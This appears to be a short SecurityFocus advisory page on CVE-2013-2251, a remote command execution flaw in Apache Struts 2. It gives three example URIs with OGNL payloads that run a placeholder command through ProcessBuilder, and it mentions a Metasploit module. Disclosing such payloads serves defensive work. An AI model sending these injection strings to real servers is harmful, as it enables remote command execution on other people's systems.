Apache Struts CVE-2013-2251 Multiple Remote Command Execution Vulnerabilities

An attacker can exploit these issues using a web browser.

Core Security Technologies has developed a working commercial exploit for its CORE IMPACT product.

The following example URIs and a Metasploit exploit module are available:

http://www.example.com/struts2-blank/example/X.action?action:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'command','goes','here'})).start()}
http://www.example.com/struts2-showcase/employee/save.action?redirect:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'command','goes','here'})).start()}
http://www.example.com/struts2-showcase/employee/save.action?redirectAction:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'command','goes','here'})).start()}


 

Privacy Statement
Copyright 2010, SecurityFocus